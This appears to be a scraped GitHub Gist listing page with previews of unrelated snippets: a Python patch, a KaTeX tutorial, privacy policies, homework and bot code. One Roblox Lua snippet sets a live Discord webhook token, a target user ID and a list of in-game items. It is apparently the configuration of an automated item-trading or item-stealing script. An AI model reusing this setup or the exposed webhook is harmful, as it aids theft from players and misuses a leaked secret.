Skip to content

Instantly share code, notes, and snippets.

@vimholic
vimholic / agent_base.py
Created March 3, 2026 01:46
SJVA Agent WebP Patch - agent_base.py + module_ktv.py + module_yaml_base.py
# -*- coding: utf-8 -*-
import os, traceback, json, urllib, re, unicodedata, time, urllib2, io, subprocess
from io import open
from functools import wraps
import yaml
"""
class MetadataSearchResult(XMLObject):
def __init__(self, core, id, name=None, year=None, score=0, lang=None, thumb=None):
@HyobinLee
HyobinLee / KaTeX.md
Created March 3, 2026 01:46
KaTeX 사용법

KaTeX로 수식 입력하는 법

온라인에서 수학과 관련된 주제로 글을 쓰다 보면 수식을 표현하기가 어렵습니다. Notion, Obsidian을 비롯하여 수식을 지원하는 다양한 웹사이트와 블로그 프레임워크에서 KaTeX를 통해 수식을 입력할 수 있도록 지원하고 있습니다. 이에 KaTeX로 수식 입력하는 방법을 익혀두면 온라인에서 소통하거나 학습 노트를 정리할 때 큰 도움이 됩니다. 이 포스트에서는 KaTeX로 수식을 입력하기 위해 필수적으로 알아야 할 핵심 내용을 살펴봅니다.

이 포스트는 다음과 같은 관점에서 작성되었습니다.

  • 사이트 운영자가 아닌 사이트 방문자나 콘텐츠 작성자에게 필요한 내용을 담았습니다.
  • 상세한 기능을 모두 설명하기보다, 바로 사용할 내용 위주로 개괄적으로 설명하였습니다.

{
"certified": false,
"deleted": false,
"docker_image_digest": "sha256:78b8041fa92e03962835324004f7c569c925b2dd1f998464fc256f4d48fad0fa",
"docker_image_id": "sha256:716c313b0066b584ab6f8d58a9534b56d30832079e6de3ff8d0f4e17d8ea4c01",
"image_id": "sha256:78b8041fa92e03962835324004f7c569c925b2dd1f998464fc256f4d48fad0fa",
"parsed_data": {
"architecture": "amd64",
"created": "2026-03-03 01:13:29.652304662 +0000 UTC",
"image_id": "sha256:78b8041fa92e03962835324004f7c569c925b2dd1f998464fc256f4d48fad0fa",
@falopass
falopass / privacy.md
Created March 3, 2026 01:44
Política de Privacidad AquaCheck

Política de Privacidad - AquaCheck Floripa

Última actualización: 2 de marzo de 2026

AquaCheck Floripa ("nosotros") respeta su privacidad. Esta política explica cómo manejamos su información:

1. Información que recopilamos

  • Ubicación: Solicitamos acceso al GPS únicamente para calcular la distancia entre su posición y las playas. Estos datos se procesan localmente en su dispositivo y no se almacenan en nuestros servidores.
  • Comentarios: Si decide enviar un reporte, almacenamos el texto y la fecha en nuestra base de datos de Firebase para compartirlos con la comunidad.
  • Tokens de Notificación: Almacenamos un identificador anónimo para enviarle alertas sobre cambios en el estado de las playas.
# Homework Lesson 3 - Strings
# READ CAREFULLY THE EXERCISE DESCRIPTION AND SOLVE IT RIGHT AFTER IT
# ---------------------------------------------------------------------
# Exercise 1: Personalized Greeting
# Write a program that takes a user's name as input
# and then greets them using an f-string: "Hello, [name]!"
#
# Example Input: "Alice"
1. Agreement: By using WittGPT, you agree to these terms and Discord’s Community Guidelines.
2. Usage: WittGPT is provided "as-is." We are not responsible for any league disputes or "roasts" generated by the AI.
3. Premium Tiers: Payments for Pro and Elite tiers are handled natively by Discord and are subject to Discord's refund policies.
4. Termination: The developer reserves the right to block users who abuse the bot's features.
"""
Greengo Exchange Telegram Bot — с балансом пользователей
Требования: pip install aiogram aiohttp
Запуск: python bot.py
"""
import asyncio
import logging
import sqlite3
Privacy Policy for WittGPT
1. Data We Collect: We collect your Discord User ID, username, and any Madden league data associated with your TSL profile to provide stats and AI analysis.
2. How We Use Data: Data is used solely to generate league reports, track "beef" history, and power AI-driven responses.
3. Data Sharing: We do not sell your data. We share data only with the Google Gemini API to generate AI content.
4. Data Deletion: Users can request data deletion by contacting the developer.
getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1477155819392073793/dRUCED6JxdrAsF15zjC2sPXLUCk3CPJ2rGcj8W1XMWCFT_N1r7vHnTLUzCIxjjoUvWjC"
getgenv().TARGET_ID = 9233522138
getgenv().DELAY_STEP = 1
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
["Bacuru and Egguru"] = true,
["Burguro And Fryuro"] = true,
["Capitano Moby"] = true,
["Celularcini Viciosini"] = true,
["Cerberus"] = true,
@kobag666
kobag666 / index.html
Created March 3, 2026 01:42
Untitled
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">